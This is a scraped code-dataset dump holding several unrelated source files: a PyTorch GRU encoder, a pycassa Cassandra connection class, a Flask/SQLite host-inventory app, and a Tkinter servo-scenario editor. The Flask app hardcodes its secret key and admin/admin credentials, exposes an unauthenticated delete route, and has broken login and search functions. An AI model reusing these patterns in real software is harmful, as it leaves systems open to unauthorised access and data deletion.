"call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}]}
+{"seq_id": "43419146", "text": "import torch\nimport torch.nn as nn\n\n\nclass Encoder(nn.Module):\n def __init__(self, input_dim, embed_dim, enc_hidden_dim,\n dec_hidden_dim, dropout_ratio):\n super().__init__()\n\n # 임베딩(embedding)은 원-핫 인코딩(one-hot encoding)을 특정 차원의 임베딩으로 매핑하는 레이어\n self.embedding = nn.Embedding(input_dim, embed_dim)\n\n # 양방향(bidirectional) GRU 레이어\n self.rnn = nn.GRU(embed_dim, enc_hidden_dim, bidirectional=True)\n\n # FC 레이어\n self.fc = nn.Linear(enc_hidden_dim * 2, dec_hidden_dim)\n\n # 드롭아웃(dropout)\n self.dropout = nn.Dropout(dropout_ratio)\n\n def forward(self, src):\n # src: [단어 개수, 배치 크기]: 각 단어의 인덱스(index) 정보\n\n # embedded: [단어 개수, 배치 크기, 임베딩 차원]\n embedded = self.dropout(self.embedding(src))\n\n outputs, hidden = self.rnn(embedded)\n # outputs: [단어 개수, 배치 크기, 인코더 히든 차원 * 방향의 수]: 전체 단어의 출력 정보\n # hidden: [레이어 개수 * 방향의 수, 배치 크기, 인코더 히든 차원]: 현재까지의 모든 단어의 정보\n\n # hidden은 Bidirectional 이기 때문에\n # [forward_1, backward_1, forward_2, backward_2, ...] 형태로 구성\n # hidden[-2, :, :]은 forwards의 마지막 값\n # hidden[-1, :, :]은 backwards의 마지막 값\n # 디코더(decoder)의 첫 번째 hidden (context) vector는 인코더의 마지막 hidden을 이용\n hidden = torch.tanh(self.fc(torch.cat((hidden[-2, :, :],\n hidden[-1, :, :]), dim=1)))\n\n # outputs은 Attention 목적으로 hidden은 context vector 목적으로 사용\n return outputs, hidden\n", "sub_path": "seq2seq_attention/encoder.py", "file_name": "encoder.py", "file_ext": "py", "file_size_in_byte": 1838, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "torch.nn.Module", "line_number": 5, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 5, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.nn.GRU", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.tanh", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "427660834", "text": "from thrift.transport import TTransport\nfrom thrift.transport import TSocket\nfrom thrift.protocol import TBinaryProtocol\n\nfrom pycassa.cassandra.c10 import Cassandra\nfrom pycassa.cassandra.constants import (CASSANDRA_07, CASSANDRA_08, CASSANDRA_10)\nfrom pycassa.cassandra.ttypes import AuthenticationRequest\nfrom pycassa.util import compatible\n\nDEFAULT_SERVER = 'localhost:9160'\nDEFAULT_PORT = 9160\n\nLOWEST_COMPATIBLE_VERSION = 17\n\nclass ApiMismatch(Exception): pass\n\nclass Connection(Cassandra.Client):\n \"\"\"Encapsulation of a client session.\"\"\"\n\n def __init__(self, keyspace, server, framed_transport=True, timeout=None,\n credentials=None, api_version=None):\n self.keyspace = None\n self.server = server\n server = server.split(':')\n if len(server) <= 1:\n port = 9160\n else:\n port = server[1]\n host = server[0]\n socket = TSocket.TSocket(host, int(port))\n if timeout is not None:\n socket.setTimeout(timeout*1000.0)\n if framed_transport:\n self.transport = TTransport.TFramedTransport(socket)\n else:\n self.transport = TTransport.TBufferedTransport(socket)\n protocol = TBinaryProtocol.TBinaryProtocolAccelerated(self.transport)\n Cassandra.Client.__init__(self, protocol)\n self.transport.open()\n\n if api_version is None:\n server_api_version = self.describe_version()\n if compatible(CASSANDRA_10, server_api_version):\n self.version = CASSANDRA_10\n if compatible(CASSANDRA_08, server_api_version):\n self.version = CASSANDRA_08\n elif compatible(CASSANDRA_07, server_api_version):\n self.version = CASSANDRA_07\n else:\n raise ApiMismatch(\"Thrift API version incompatibility: \" \\\n \"server version %s is not Cassandra 0.7, 0.8, or 1.0\" %\n (server_api_version))\n else:\n self.version = api_version\n\n self.set_keyspace(keyspace)\n\n if credentials is not None:\n request = AuthenticationRequest(credentials=credentials)\n self.login(request)\n\n def set_keyspace(self, keyspace):\n if keyspace != self.keyspace:\n Cassandra.Client.set_keyspace(self, keyspace)\n self.keyspace = keyspace\n\n def close(self):\n self.transport.close()\n", "sub_path": "pycassa/connection.py", "file_name": "connection.py", "file_ext": "py", "file_size_in_byte": 2456, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pycassa.cassandra.c10.Cassandra.Client", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pycassa.cassandra.c10.Cassandra", "line_number": 17, "usage_type": "name"}, {"api_name": "thrift.transport.TSocket.TSocket", "line_number": 30, "usage_type": "call"}, {"api_name": "thrift.transport.TSocket", "line_number": 30, "usage_type": "name"}, {"api_name": "thrift.transport.TTransport.TFramedTransport", "line_number": 34, "usage_type": "call"}, {"api_name": "thrift.transport.TTransport", "line_number": 34, "usage_type": "name"}, {"api_name": "thrift.transport.TTransport.TBufferedTransport", "line_number": 36, "usage_type": "call"}, {"api_name": "thrift.transport.TTransport", "line_number": 36, "usage_type": "name"}, {"api_name": "thrift.protocol.TBinaryProtocol.TBinaryProtocolAccelerated", "line_number": 37, "usage_type": "call"}, {"api_name": "thrift.protocol.TBinaryProtocol", "line_number": 37, "usage_type": "name"}, {"api_name": "pycassa.cassandra.c10.Cassandra.Client.__init__", "line_number": 38, "usage_type": "call"}, {"api_name": "pycassa.cassandra.c10.Cassandra.Client", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pycassa.cassandra.c10.Cassandra", "line_number": 38, "usage_type": "name"}, {"api_name": "pycassa.util.compatible", "line_number": 43, "usage_type": "call"}, {"api_name": "pycassa.cassandra.constants.CASSANDRA_10", "line_number": 43, "usage_type": "argument"}, {"api_name": "pycassa.cassandra.constants.CASSANDRA_10", "line_number": 44, "usage_type": "name"}, {"api_name": "pycassa.util.compatible", "line_number": 45, "usage_type": "call"}, {"api_name": "pycassa.cassandra.constants.CASSANDRA_08", "line_number": 45, "usage_type": "argument"}, {"api_name": "pycassa.cassandra.constants.CASSANDRA_08", "line_number": 46, "usage_type": "name"}, {"api_name": "pycassa.util.compatible", "line_number": 47, "usage_type": "call"}, {"api_name": "pycassa.cassandra.constants.CASSANDRA_07", "line_number": 47, "usage_type": "argument"}, {"api_name": "pycassa.cassandra.constants.CASSANDRA_07", "line_number": 48, "usage_type": "name"}, {"api_name": "pycassa.cassandra.ttypes.AuthenticationRequest", "line_number": 59, "usage_type": "call"}, {"api_name": "pycassa.cassandra.c10.Cassandra.Client.set_keyspace", "line_number": 64, "usage_type": "call"}, {"api_name": "pycassa.cassandra.c10.Cassandra.Client", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pycassa.cassandra.c10.Cassandra", "line_number": 64, "usage_type": "name"}]}
+{"seq_id": "78552534", "text": "# imports\nimport os\nimport sqlite3\nimport json\n\n\nfrom flask import Flask, request, session, g, redirect, url_for, \\\n abort, flash, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\n\n\n# get the folder where this file runs\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\n# configuration\nDATABASE = 'esxi.db'\nDEBUG = True\nSECRET_KEY = 'my_precious'\nUSERNAME = 'admin'\nPASSWORD = 'admin'\n\n# define the full path for the database\nDATABASE_PATH = os.path.join(basedir, DATABASE)\n\n# database config\nSQLALCHEMY_DATABASE_URI = 'sqlite:///' + DATABASE_PATH\nSQLALCHEMY_TRACK_MODIFICATIONS = False\n\n# create app\napp = Flask(__name__)\napp.config.from_object(__name__)\ndb = SQLAlchemy(app)\n\nimport models\n\n\n@app.route('/add/host', methods=['POST'])\ndef add_host():\n \"\"\"Adds new host to the database.\"\"\"\n if not session.get('logged_in'):\n abort(401)\n new_entry = models.Hosts(request.form['host_ip'], request.form['alarming'], request.form['remediation'])\n db.session.add(new_entry)\n db.session.commit()\n flash('New entry was successfully posted')\n return redirect(url_for('index'))\n\n@app.route('/add/process', methods=['POST'])\ndef add_process():\n \"\"\"Adds new process to the database.\"\"\"\n if not session.get('logged_in'):\n abort(401)\n new_entry = models.Process(request.form['cli'], request.form['inbound'], request.form['outbound'], request.form['counter'])\n db.session.add(new_entry)\n db.session.commit()\n flash('New entry was successfully posted')\n return redirect(url_for('index'))\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n \"\"\"User login/authentication/session management.\"\"\"\n error = None\n if request.method == 'POST':\n if request.form['username'] != app.config['USERNAME']:\n error = 'Invalid username'\n elif request.form['password'] != app.config['PASSWORD']:\n error = 'Invalid password'\n else:\n session['logged_in'] = True\n\n\n@app.route('/logout')\ndef logout():\n \"\"\"User logout/authentication/session management.\"\"\"\n session.pop('logged_in', None)\n flash('You were logged out')\n return redirect(url_for('login'))\n\n\n@app.route('/delete/', methods=['GET'])\ndef delete_entry(post_id):\n \"\"\"Deletes post from database.\"\"\"\n result = {'status': 0, 'message': 'Error'}\n try:\n new_id = post_id\n db.session.query(models.Hosts).filter_by(post_id=new_id).delete()\n db.session.commit()\n result = {'status': 1, 'message': \"Post Deleted\"}\n flash('The entry was deleted.')\n except Exception as e:\n result = {'status': 0, 'message': repr(e)}\n return jsonify(result)\n\n\n@app.route('/search/', methods=['GET'])\ndef search():\n query = request.args.get(\"query\")\n entries = db.session.query(models.Hosts)\n if query:\n return render_template('search.html', entries=entries, query=query)\n return render_template('search.html')\n\n@app.route('/get/inventory', methods=['GET'])\ndef get_inventory():\n table_name = 'hosts'\n db_file = 'esxi.db'\n\n conn = sqlite3.connect(db_file)\n conn.row_factory = sqlite3.Row # This enables column access by name: row['column_name'] \n db = conn.cursor()\n\n rows = db.execute(\"SELECT * from %s\" % table_name).fetchall()\n\n conn.commit()\n conn.close()\n\n return json.dumps( [dict(x) for x in rows], indent=4 ) #CREATE JSON\n\n@app.route('/get/process', methods=['GET'])\ndef get_process():\n table_name = 'process'\n db_file = 'esxi.db'\n\n conn = sqlite3.connect(db_file)\n conn.row_factory = sqlite3.Row # This enables column access by name: row['column_name'] \n db = conn.cursor()\n\n rows = db.execute(\"SELECT * from %s\" % table_name).fetchall()\n\n conn.commit()\n conn.close()\n\n return json.dumps( [dict(x) for x in rows], indent=4 ) #CREATE JSON\n\n\ndef create_db():\n from models import Hosts, Process\n # create the database and the db table\n db.create_all()\n\n # commit the changes\n db.session.commit()\n\nif __name__ == '__main__':\n create_db()\n app.run()\n", "sub_path": "flaskr-tdd/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 4058, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.abspath", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "flask.Flask", "line_number": 30, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.session.get", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 41, "usage_type": "call"}, {"api_name": "models.Hosts", "line_number": 42, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 42, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 42, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 46, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 46, "usage_type": "call"}, {"api_name": "flask.session.get", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 51, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 52, "usage_type": "call"}, {"api_name": "models.Process", "line_number": 53, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 53, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 53, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 56, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 64, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 64, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 65, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 65, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 67, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 67, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 70, "usage_type": "name"}, {"api_name": "flask.session.pop", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 76, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 78, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 78, "usage_type": "call"}, {"api_name": "models.Hosts", "line_number": 87, "usage_type": "attribute"}, {"api_name": "flask.flash", "line_number": 90, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 93, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 98, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 98, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 98, "usage_type": "name"}, {"api_name": "models.Hosts", "line_number": 99, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 109, "usage_type": "call"}, {"api_name": "sqlite3.Row", "line_number": 110, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 118, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 125, "usage_type": "call"}, {"api_name": "sqlite3.Row", "line_number": 126, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 134, "usage_type": "call"}]}
+{"seq_id": "638846509", "text": "from tkinter import *\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter.filedialog import askopenfilename\nimport threading\nimport sqlite3\nfrom subprocess import call,PIPE,Popen\nimport shutil\nfrom sketchbooks.SW.run_servo import compiling\nfrom db_input import *\nimport os\n\nclass Demo2:\n def __init__(self, master):\n self.master = master\n self.master.geometry('800x400')\n self.frame = tk.Frame(self.master)\n self.master.title('серво менеджер')\n ##########angles from window######################\n self.left_eye = 0\n self.right_e = 0\n self.right_sholder = 0\n self.right_hand = 0\n self.left_hand = 0\n self.left_leg = 0\n self.right_leg = 0\n self.reserved_1 = 0\n self.reserved_2 = 0\n #################VALUES FOR TIMER##################################\n self.timer = False\n self.default_seconds = 0\n self.timer_seconds = self.default_seconds\n self.sql_time=[]\n self.sql_servo_1 = 0\n self.sql_servo_2 = 0\n self.sql_servo_3 = 0\n self.sql_servo_4 = 0\n self.sql_servo_5 = 0\n self.sql_servo_6 = 0\n self.sql_servo_7 = 0\n self.sql_servo_8 = 0\n self.sql_servo_9 = 0\n self.sql_speed = 0\n self.speed =0\n self.time = 0\n ##################\n self.current_name_db = ''\n self.path = 'position.dms'\n\n self.lab_ser_1 = ttk.Label(self.master, text='глаз левый ').grid(row=0, column=1)\n self.left_eye = IntVar()\n self.angle_box1 = ttk.Entry(self.master, textvariable=self.left_eye, width=3)\n self.angle_box1.grid(row=1, column=1)\n\n self.lab_ser_2 = ttk.Label(self.master, text='глаз правый').grid(row=4, column=1)\n self.right_e = IntVar()\n self.angle_box2 = ttk.Entry(self.master, textvariable=self.right_e, width=3)\n self.angle_box2.grid(row=5, column=1)\n\n self.lab_ser_3 = ttk.Label(self.master, text='плечо правое').grid(row=8, column=1)\n self.right_sholder = IntVar()\n self.angle_box3 = ttk.Entry(self.master, textvariable=self.right_sholder, width=3)\n self.angle_box3.grid(row=9, column=1)\n\n self.lab_ser_4 = ttk.Label(self.master, text='рука правая').grid(row=0, column=2)\n self.right_hand = IntVar()\n self.angle_box4 = ttk.Entry(self.master, textvariable=self.right_hand, width=3)\n self.angle_box4.grid(row=1, column=2)\n\n self.lab_ser_5 = ttk.Label(self.master, text='рука левая').grid(row=4, column=2)\n self.left_hand = IntVar()\n self.angle_box5 = ttk.Entry(self.master, textvariable=self.left_hand, width=3)\n self.angle_box5.grid(row=5, column=2)\n\n self.lab_ser_6 = ttk.Label(self.master, text='нога левая').grid(row=8, column=2)\n self.left_leg = IntVar()\n self.angle_box6 = ttk.Entry(self.master, textvariable=self.left_leg, width=3)\n self.angle_box6.grid(row=9, column=2)\n\n self.lab_ser_7 = ttk.Label(self.master, text='нога правая ').grid(row=0, column=3)\n self.right_leg = IntVar()\n self.angle_box7 = ttk.Entry(self.master, textvariable=self.right_leg, width=3)\n self.angle_box7.grid(row=1, column=3)\n\n self.lab_ser_8 = ttk.Label(self.master, text='reserved_1 ').grid(row=4, column=3)\n self.reserved_1 = IntVar()\n self.angle_box7 = ttk.Entry(self.master, textvariable=self.reserved_1, width=3)\n self.angle_box7.grid(row=5, column=3)\n\n self.lab_ser_9 = ttk.Label(self.master, text='reserved_2 ').grid(row=8, column=3)\n self.reserved_2 = IntVar()\n self.angle_box7 = ttk.Entry(self.master, textvariable = self.reserved_2, width=3)\n self.angle_box7.grid(row=9, column=3)\n\n self.play_butt = ttk.Button(self.master, text='проиграть',command=self.some_play).grid(row=12, column=2)\n\n self.button = ttk.Button(self.master, text='записать позиции',command =self.write_position)\n self.button.grid(row=13, column=2)\n\n\n\n self.write = ttk.Button(self.master, text='удалить все значения',command = self.create_new) .grid(row=15, column=2,)\n self.time_label = ttk.Label(self.master, text=\"время\").grid(row=18, column=2, sticky='ws', padx=0)\n self.time_scale = ttk.Scale(self.master, orient='horizontal', length=400, from_=0, to=180,command =self.printime )\n self.time_scale.grid(row=19, column=2,pady=10)\n #digit near \"время\"\n self.time_digit = ttk.Label(self.master)\n self.time_digit.grid(row=18, column=2, sticky='w', padx=50)#padx control shift some construction , more this more to right\n\n\n\n self.speed_label = ttk.Label(self.master,text =\"cкорость\").grid(row=16,column =2,sticky = 'ws',padx=0)\n # digit near \"скорость\"\n self.speed_digit = ttk.Label(self.master)\n self.speed_digit.grid(row=16,column =2,sticky = 'w',padx=65)\n\n self.speed_slider = ttk.Scale(self.master,orient = \"horizontal\", length =100,from_ = 0 ,to =100,command =self.prinw)\n self.speed_slider.grid(row=17,column =2,sticky = 'ws',padx=0)\n\n self.label_time = ttk.Label(self.master)\n self.label_time.grid(row=15, column=2)\n # self.background_image = tk.PhotoImage(...)\n # self.background_label = tk.Label(self.master, image=background_image)\n # self.background_label.place(x=0, y=0, relwidth=1, relheight=1)\n self.new = ttk.Button(self.master,text=\"новый сценарий\",command = self.new_data).grid(row =1,column =8)\n self.window_curr = ttk.Button(self.master,text=\"выбрать сценарий\",command = self.choose_db).grid(row =3,column =8,sticky = 'e')\n self.window_db = Listbox(self.master,width=25,height=3)\n self.window_db.grid(row=15,column=8,sticky= 'w')\n self.request_butt = ttk.Button(self.master,text='выбрать текущий',command = self.current_db).grid(row=16,column=8,sticky= 'w')\n\n\n\n def prinw(self,val):\n #define for speed\n self.speed=round(float(val))\n #change label to define speed\n self.speed_digit.configure(text=round(self.speed))\n def printime(self,val):\n #define for speed\n self.time=round(float(val))\n m = self.time // 60\n s = self.time - m * 60\n self.time_digit.configure(text='%02d:%02d' % (m, s))\n\n\n\n def choose_db(self):\n fname = askopenfilename(filetypes=((\"scenario\", \"*.db\"),\n (\"All files\", \"*.*\") ))\n print(fname[-6:-1])\n self.current_name_db = fname\n self.window_db.insert(END,fname[-25:-1] + '\\n')\n def current_db(self):\n self.path = self.current_name_db\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n def write_position(self):\n #on sql\n\n conn = sqlite3.connect(self.path)\n cursor = conn.cursor()\n cursor.executescript(\"\"\"\n insert into `time` values (%d)\n \"\"\" % (round(self.time_scale.get()*1000)))#time\n cursor.executescript(\"\"\"\n insert into `speed` values (%d)\n \"\"\" % (round(self.speed_slider.get()))) # speed\n cursor.executescript(\"\"\"\n insert into `servo_2` values (%d)\n \"\"\" % (self.left_eye.get()))#servo_1\n cursor.executescript(\"\"\"\n insert into `servo_1` values (%d)\n \"\"\" % (self.right_e.get()))#servo_2\n cursor.executescript(\"\"\"\n insert into `servo_3` values (%d)\n \"\"\" % (self.right_sholder.get()))#servo_3\n cursor.executescript(\"\"\"\n insert into `servo_4` values (%d)\n \"\"\" % (self.left_hand.get()))#servo_4\n cursor.executescript(\"\"\"\n insert into `servo_5` values (%d)\n \"\"\" % (self.right_hand.get()))#servo_5\n cursor.executescript(\"\"\"\n insert into `servo_6` values (%d)\n \"\"\" % (self.right_leg.get()))# servo_6\n cursor.executescript(\"\"\"\n insert into `servo_7` values (%d)\n \"\"\" % (self.left_leg.get()))# servo_7\n cursor.executescript(\"\"\"\n insert into `servo_8` values (%d)\n \"\"\" % (self.reserved_1.get()))#servo_8\n cursor.executescript(\"\"\"\n insert into `servo_9` values (%d)\n \"\"\" % (self.reserved_2.get()))#servo_9\n self.write_to_h()\n\n\n\n\n def clear_strings(self):\n # clean by rubish\n f = open('template.h','r')\n o = open('VAL.h', 'w')\n while 1:\n line = f.readline()\n if not line: break\n line = line.replace('(', '')\n line = line.replace(')', '')\n line = line.replace(',,', ',')\n line = line.replace(\"''\", '0')\n line = line.replace('[][]','[]')\n line = line.replace('{[]}','{}')\n line = line.replace('{[','{')\n line = line.replace(']}','}')\n line = line.replace(')]};','')\n o.write(line)\n o.close()\n call('rm template.h',shell =True)\n # move VAL.h with values from sql to arduino library:******************\n shutil.move(\"/home/qbc/PycharmProjects/ard/VAL.h\", \"/usr/share/arduino/hardware/arduino/cores/arduino/VAL.h\")\n # call('rm VAL.h',shell =True)\n\n\n\n\n def write_to_h(self):\n # take all from data base\n conn = sqlite3.connect(self.path)#here will be avalibale data bases\n cursor = conn.cursor()\n #time\n cursor.execute(\"SELECT * FROM `time` order by `time_pos` \")\n self.sql_time = cursor.fetchall()\n # servo_1\n cursor.execute(\"SELECT * FROM `servo_1` \")\n self.sql_servo_1 =cursor.fetchall()\n # servo_2\n cursor.execute(\"SELECT * FROM `servo_2` \")\n self.sql_servo_2 = cursor.fetchall()\n # servo_3\n cursor.execute(\"SELECT * FROM `servo_3` \")\n self.sql_servo_3 = cursor.fetchall()\n # servo_4\n cursor.execute(\"SELECT * FROM `servo_4` \")\n self.sql_servo_4 = cursor.fetchall()\n # servo_5\n cursor.execute(\"SELECT * FROM `servo_5` \")\n self.sql_servo_5= cursor.fetchall()\n # servo_6\n cursor.execute(\"SELECT * FROM `servo_6` \")\n self.sql_servo_6 = cursor.fetchall()\n # servo_7\n cursor.execute(\"SELECT * FROM `servo_7` \")\n self.sql_servo_7 = cursor.fetchall()\n # servo_8\n cursor.execute(\"SELECT * FROM `servo_8` \")\n self.sql_servo_8 = cursor.fetchall()\n # servo_9\n cursor.execute(\"SELECT * FROM `servo_9` \")\n self.sql_servo_9 = cursor.fetchall()\n cursor.execute(\"SELECT * FROM `speed` order by `speed_pos` \")\n self.sql_speed = cursor.fetchall()\n # servo_1\n\n with open('template.h','w') as file:\n file.writelines('int time_play=1;\\n')\n file.writelines('int speed_row[] = {')\n file.writelines(str(self.sql_speed))\n file.writelines('};\\n')\n file.writelines('int LEyeArray[][] = {')\n file.writelines(str(self.sql_servo_1))\n file.writelines('};\\n')\n file.writelines('int REyeArray[] = {')\n file.writelines(str(self.sql_servo_2))\n file.writelines('};\\n')\n file.writelines('int LArmArray[] = {')\n file.writelines(str(self.sql_servo_3))\n file.writelines('};\\n')\n file.writelines('int RArmArray[] = {')\n file.writelines(str(self.sql_servo_4))\n file.writelines('};\\n')\n file.writelines('int LhandArray[] = {')\n file.writelines(str(self.sql_servo_5))\n file.writelines('};\\n')\n file.writelines('int RhandArray[] = {')\n file.writelines(str(self.sql_servo_6))\n file.writelines('};\\n')\n file.writelines('int LLegArray[] = {')\n file.writelines(str(self.sql_servo_7))\n file.writelines('};\\n')\n file.writelines('int RLegArray[] = {')\n file.writelines(str(self.sql_servo_8))\n file.writelines('};\\n')\n file.writelines('int AssArray[] = {')\n file.writelines(str(self.sql_servo_9))\n file.writelines('};\\n')\n file.writelines('unsigned long KeyArray[] = {')\n file.writelines(str(self.sql_time))\n file.writelines('};\\n')\n self.clear_strings()\n\n def create_new(self):\n conn = sqlite3.connect('position.dms')\n cursor = conn.cursor()\n cursor.execute(\n 'CREATE TABLE servo_1 (servo1_pos integer );')\n cursor.execute(\n 'CREATE TABLE servo_2 (servo2_pos integer );')\n cursor.execute(\n 'CREATE TABLE servo_3 (servo3_pos integer );')\n cursor.execute(\n 'CREATE TABLE servo_4 (servo4_pos integer );')\n cursor.execute(\n 'CREATE TABLE servo_5 (servo5_pos integer );')\n cursor.execute(\n 'CREATE TABLE servo_6 (servo6_pos integer );')\n cursor.execute(\n 'CREATE TABLE servo_7 (servo7_pos integer );')\n cursor.execute(\n 'CREATE TABLE servo_8 (servo8_pos integer );')\n cursor.execute(\n 'CREATE TABLE servo_9 (servo9_pos integer );')\n cursor.execute(\n 'CREATE TABLE speed (speed_pos integer );')\n cursor.execute(\n 'CREATE TABLE time (time_pos integer );')\n # self.deleteall()\n def deleteall(self):\n conn = sqlite3.connect('position.dms')\n cursor = conn.cursor()\n\n # cursor.execute('drop table `time`')\n # cursor.execute('drop table `speed`')\n # cursor.execute('drop table `servo_1`')\n # cursor.execute('drop table `servo_2`')\n # cursor.execute('drop table `servo_3`')\n # cursor.execute('drop table `servo_4`')\n # cursor.execute('drop table `servo_5`')\n # cursor.execute('drop table `servo_6`')\n # cursor.execute('drop table `servo_7`')\n # cursor.execute('drop table `servo_8`')\n # cursor.execute('drop table `servo_9`')\n cursor.execute('DELETE FROM servo_1 ')\n cursor.execute('DELETE FROM servo_2 ')\n cursor.execute('DELETE FROM servo_3 ')\n cursor.execute('DELETE FROM servo_4 ')\n cursor.execute('DELETE FROM servo_5 ')\n cursor.execute('DELETE FROM servo_6 ')\n cursor.execute('DELETE FROM servo_7 ')\n cursor.execute('DELETE FROM servo_8 ')\n cursor.execute('DELETE FROM servo_9 ')\n cursor.execute('DELETE FROM speed ')\n cursor.execute('DELETE FROM time ')\n conn.commit()\n\n\n\n def some_play(self):\n t1 = threading.Thread(target=compiling)\n t1.start()\n\n\n #window for create new data bases(described in db_input)\n def new_data(self):\n self.newWindow = tk.Toplevel(self.master)\n self.app = new_base(self.newWindow)", "sub_path": "main_window.py", "file_name": "main_window.py", "file_ext": "py", "file_size_in_byte": 14882, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "tkinter.Frame", "line_number": 17, "usage_type": "call"}, {"api_name": "tkinter.ttk.Label", "line_number": 50, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 50, "usage_type": "name"}, {"api_name": "tkinter.ttk.Entry", "line_number": 52, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 52, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 55, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 55, "usage_type": "name"}, {"api_name": "tkinter.ttk.Entry", "line_number": 57, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 57, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 60, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 60, "usage_type": "name"}, {"api_name": "tkinter.ttk.Entry", "line_number": 62, "usage_type": 